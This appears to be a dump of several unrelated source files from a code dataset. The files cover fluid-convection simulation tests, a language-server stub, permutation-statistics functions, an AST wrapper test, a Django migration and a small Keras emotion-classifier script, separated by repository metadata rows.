aspect_ratio = params.oper.aspect_ratio = 1.0 / 41
params.prandtl = 1.0
params.Ra_vert = 1705
params.output.sub_directory = "tests_snek_cbox"
params.oper.nproc_min = 2
params.oper.dim = 2
nb_elements = 1
params.oper.ny = nb_elements
params.oper.nx = int(nb_elements / aspect_ratio)
params.oper.nz = int(nb_elements / aspect_ratio)
Ly = params.oper.Ly
Lx = params.oper.Lx = Ly / aspect_ratio
params.oper.x_periodicity = True
params.oper.mesh_stretch_factor = 0.0
params.oper.elem.order = params.oper.elem.order_out = 12
# creation of the coordinates of the points saved by history points
n1d = 4
small = Lx / 10
xs = np.linspace(0, Lx, n1d)
xs[0] = small
xs[-1] = Lx - small
ys = np.linspace(0, Ly, n1d)
ys[0] = small
ys[-1] = Ly - small
coords = [(x, y) for x in xs for y in ys]
params.output.history_points.coords = coords
params.oper.max.hist = len(coords) + 1
params.nek.general.dt = 0.05
params.nek.general.end_time = 500
params.nek.general.stop_at = "endTime"
params.nek.general.target_cfl = 2.0
params.nek.general.time_stepper = "BDF3"
params.nek.general.write_control = "runTime"
params.nek.general.write_interval = 1000
params.output.history_points.write_interval = 100
params.output.phys_fields.write_interval_pert_field = 200
return params
# for an infinite layer of fluid with Pr = 1.0, the onset of convection is at Ra_c = 1708
@pytest.mark.slow
def test_simple_RB_nonconvective_simul():
params = params_RB()
params.Ra_vert = 1705
sim = Simul(params)
sim.make.exec("run_fg", resources={"nproc": 4})
sim = load(sim.path_run)
coords, df = sim.output.history_points.load()
times = df[df.index_points == 1].time
t_max = times.max()
# check a physical result,
temperature_last = df[df.time == t_max].temperature
assert temperature_last.abs().max() < 0.45
# check we do not have convection,
ux_last = df[df.time == t_max].ux
assert ux_last.abs().max() < 1e-7 # noise amplitude is 1e-5
# if everything is fine, we can cleanup the directory of the simulation
rmtree(sim.path_run, ignore_errors=True)
@pytest.mark.slow
def test_simple_RB_convective_simul():
params = params_RB()
params.Ra_vert = 1750
params.nek.general.end_time = 2000
sim = Simul(params)
sim.make.exec("run_fg", resources={"nproc": 4})
sim = load(sim.path_run)
coords, df = sim.output.history_points.load()
times = df[df.index_points == 1].time
t_max = times.max()
# check a physical result,
temperature_last = df[df.time == t_max].temperature
assert temperature_last.abs().max() < 0.45
# check we have convection,
ux_last = df[df.time == t_max].ux
assert ux_last.abs().max() > 2e-2 # noise amplitude is 1e-5
# if everything is fine, we can cleanup the directory of the simulation
rmtree(sim.path_run, ignore_errors=True)
@pytest.mark.slow
def test_RB_linear_nonconvective_simul():
params = params_RB()
params.Ra_vert = 1705
params.nek.problemtype.equation = "incompLinNS"
params.oper.elem.staggered = "auto"
sim = Simul(params)
sim.make.exec("run_fg", resources={"nproc": 4})
sim = load(sim.path_run)
coords, df = sim.output.history_points.load()
times = df[df.index_points == 1].time
t_max = times.max()
# check we do not have convection,
ux_last = df[df.time == t_max].ux
assert ux_last.abs().max() < 1e-7 # noise amplitude is 1e-5
# if everything is fine, we can cleanup the directory of the simulation
rmtree(sim.path_run, ignore_errors=True)
@pytest.mark.slow
def test_RB_linear_convective_simul():
params = params_RB()
params.Ra_vert = 1750
params.nek.general.end_time = 2000
params.nek.problemtype.equation = "incompLinNS"
params.oper.elem.staggered = "auto"
sim = Simul(params)
sim.make.exec("run_fg", resources={"nproc": 4})
sim = load(sim.path_run)
coords, df = sim.output.history_points.load()
times = df[df.index_points == 1].time
t_max = times.max()
# check we have convection,
ux_last = df[df.time == t_max].ux
assert ux_last.abs().max() > 2e-2 # noise amplitude is 1e-5
# if everything is fine, we can cleanup the directory of the simulation
rmtree(sim.path_run, ignore_errors=True)
| 4,648 |
languageserver/server/__init__.py
|
cybojenix/languageserver-python
| 0 |
2023686
|
from typing import TYPE_CHECKING, Optional, Type
from .registry import Registry
if TYPE_CHECKING:
from .registry import T_Arg, T_Ret, MakesAsync, RegisterTarget
from languageserver.protocol.requests import Request
from languageserver.protocol.notifications import Notification
class Server:
registry: Registry
def __init__(self, registry: Optional[Registry] = None):
self.registry = registry or Registry()
def on(
self, request_type: "Type[RegisterTarget[T_Arg, T_Ret]]",
) -> "MakesAsync[T_Arg, T_Ret]":
return self.registry.register(request_type)
async def send_request(self, request: "Request[T_Arg, T_Ret]") -> T_Ret:
pass
async def send_notification(self, notification: "Notification[T_Arg]") -> None:
pass
| 796 |
python/ssm/stats/permutation_testing.py
|
ClinicalCardiovascEngGroup/SSM
| 4 |
2022630
|
#!/usr/bin/python
# coding: utf8
"""
Simplified version of stat_t_test (without multiprocessing)
used to compute Hotelling statistic
threshold for independant testing:
rv = scipy.stats.t(df=(n1+n2-2))
th = rv.ppf(0.95)
"""
import numpy as np
from .statistics import *
################################################################################
def zmap_1perm_2samp(X, cat1, cat2=None, rand_seed=-1, fstat=None, name=None):
""" une permutation
X (D, N, P) K points, N subjects, D dim
return:
Y (D,) zvalue at each point
"""
if fstat is None:
fstat = hotelling_2samples
#name = "MP-Hotelling"
if cat2 is None:
cat2 = np.logical_not(cat1)
# Données
if rand_seed < 0:
# Sans permutation (on peut remplacer cat par idx[cat])
ix1 = cat1
ix2 = cat2
else:
# Avec permutation
np.random.seed(rand_seed)
idx = np.arange(X.shape[1])[cat1 | cat2]
per = np.random.permutation(idx.size)
nsplit = cat1.sum()
ix1 = idx[per][:nsplit]
ix2 = idx[per][nsplit:]
# Run
Y = fstat(X[:, ix1, :], X[:, ix2, :])
if name is not None:
print(name + " {0}, {1}\n".format(Y.min(), Y.max()))
return Y
def zval_kperm_2samp(X, cat1, cat2=None, nperm=100, fstat=None):
"""
simple loop, no optimization
return the extrema sorted
return:
lmin, lmax
"""
if cat2 is None:
cat2 = np.logical_not(cat1)
lmin = np.zeros((nperm,))
lmax = np.zeros((nperm,))
for i in range(nperm):
Y0 = zmap_1perm_2samp(X, cat1, cat2, rand_seed=i, fstat=fstat)
lmax[i] = Y0.max()
lmin[i] = Y0.min()
lmax.sort()
lmin.sort()
return lmin, lmax
################################################################################
def zmap_1perm_2pairedsamp(X, rand_seed=-1, name=None):
""" une permutation (changement de signe)
X (D, N, P) D points, N subjects, P dim
return:
Y (D,) zvalue at each point
"""
(d, n, p) = X.shape
# Données
if rand_seed < 0:
# Sans permutation
sign_swap = np.ones((1, n, 1))
else:
# Avec permutation
sign_swap = np.random.randint(0, 2, size=(1, n, 1))
sign_swap = 2*sign_swap - 1
# Run
Y = hotelling_1sample(X * sign_swap)
if name is not None:
print(name + " {0}, {1}\n".format(Y.min(), Y.max()))
return Y
def zval_kperm_2pairedsamp(X, nperm):
"""
simple loop, no optimization
return the extrema sorted
return:
lmin, lmax
"""
lmin = np.zeros((nperm,))
lmax = np.zeros((nperm,))
for i in range(nperm):
Y0 = zmap_1perm_2pairedsamp(X, rand_seed=i)
lmax[i] = Y0.max()
lmin[i] = Y0.min()
lmax.sort()
lmin.sort()
return lmin, lmax
################################################################################
def zmap_kperm_llh(X, y, nperm, nvar0=1):
"""
WIP
log-likelihood testing for non parametric permutation regression testing
nvar0 is used to set the reference model
X (n, d, p) deformation
y (n, q) clinicals
return
L (d, nperm+1)
L[:, 0], no-permutation map
np.max(L[:, 1:], axis=0) permutation maxs
"""
n, d, p = X.shape
K = np.zeros((d, 1))
L = np.zeros((d, nperm+1))
# reference model and no permutation
K[:, 0] = regression_loglikelihood(X, y[:, :nvar0])
L[:, 0] = regression_loglikelihood(X, y)
# with perm
for k in range(nperm):
#np.random.seed(k)
per = np.random.permutation(n)
yp = y.copy()
yp[:, nvar0:] = y[per, nvar0:]
L[:, k+1] = regression_loglikelihood(X, yp)
L = L - K
return L, L[:, 0], np.max(L[:, 1:], axis=0)
################################################################################
def compute_pvalues(zmap, zsamp, alpha_threshold=1., do_sort=True):
"""
Compute p-values on the right only using:
- zmap (vdim,) z-values
- zsamp (nsamp,) empirical z samples
return smallest k such that !(zmap[i] > zsamp[k])
can perform asymetric search on right and left
(todo voir np.searchsorted)
"""
vdim = zmap.size
nsamp = zsamp.size
if nsamp == 1:
zsamp.shape = (1,)
if do_sort:
zsamp.sort()
k_threshold = (1. - alpha_threshold)*nsamp
pval = np.zeros(vdim, dtype="uint16")
for i in range(vdim):
k = 0
while k < nsamp and zmap[i] > zsamp[k]:
k += 1
if k >= k_threshold:
pval[i] = k
return pval
| 4,629 |
src/lang/TestCases/TranslatorTestCases/wrapper_Check.py
|
Tootooroo/DevAutomator
| 0 |
2023776
|
import pytest
import ast
import astpretty
import DevAuto.Translator.ast_wrappers as wrapper
class Wrapper_TC:
@pytest.mark.skip
def test_Wrap_Expr_In_Func(self) -> None:
node = ast.Constant(value=123, kind=None)
ast.fix_missing_locations(node)
node = wrapper.wrap_expr_in_func("TEST", ["A1", "*", "A2"], node)
assert type(node) == ast.Call
assert node.func.id == "TEST"
assert node.args[0].id == "A1"
assert node.args[1].value == 123
assert node.args[2].id == "A2"
| 542 |
src/gui/migrations/0022_knowledgearticle_knowledgeattachment.py
|
digitalfabrik/ish-goalkeeper
| 12 |
2022764
|
# Generated by Django 3.2.6 on 2021-10-28 11:36
from django.db import migrations, models
import django.db.models.deletion
import filer.fields.file
import mptt.fields
class Migration(migrations.Migration):
dependencies = [
('filer', '0012_file_mime_type'),
('gui', '0021_auto_20211021_1333'),
]
operations = [
migrations.CreateModel(
name='KnowledgeArticle',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=500, verbose_name='Titel')),
('content', models.TextField(blank=True, verbose_name='Inhalt')),
('lft', models.PositiveIntegerField(editable=False)),
('rght', models.PositiveIntegerField(editable=False)),
('tree_id', models.PositiveIntegerField(db_index=True, editable=False)),
('level', models.PositiveIntegerField(editable=False)),
('parent', mptt.fields.TreeForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='children', to='gui.knowledgearticle', verbose_name='Übergeordneter Artikel')),
],
options={
'verbose_name': 'Wissen-Artikel',
'verbose_name_plural': 'Wissen-Artikel',
},
),
migrations.CreateModel(
name='KnowledgeAttachment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=150, verbose_name='Titel')),
('attached_file', filer.fields.file.FilerFileField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='knowledge_file', to='filer.file', verbose_name='Datei')),
('knowledge_article', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='attachments', to='gui.knowledgearticle', verbose_name='Wissen-Artikel')),
],
options={
'verbose_name': 'Wissens-Artikel-Anhang',
'verbose_name_plural': 'Wissens-Artikel-Anhänge',
},
),
]
| 2,279 |
model.py
|
SauravCR7/Blissify.ai
| 4 |
2023127
|
import keras
from keras.models import model_from_json
import cv2
import os
model = model_from_json(open('model.json').read())
model.load_weights('weights.h5')
def predict(X):
image = cv2.resize(X,(64,64), interpolation = cv2.INTER_CUBIC)
image = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
image = image.reshape(1,64,64,1)
image = np.array([image])
pr = model.predict(image)
for i in range(p):
if p[i]==max(p):
if i == 3:
print("Happy")
else:
print("Sad")
X = cv2.imread("data/testset/face5.jpeg")
p = predict(X)
print(p)
| 566 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.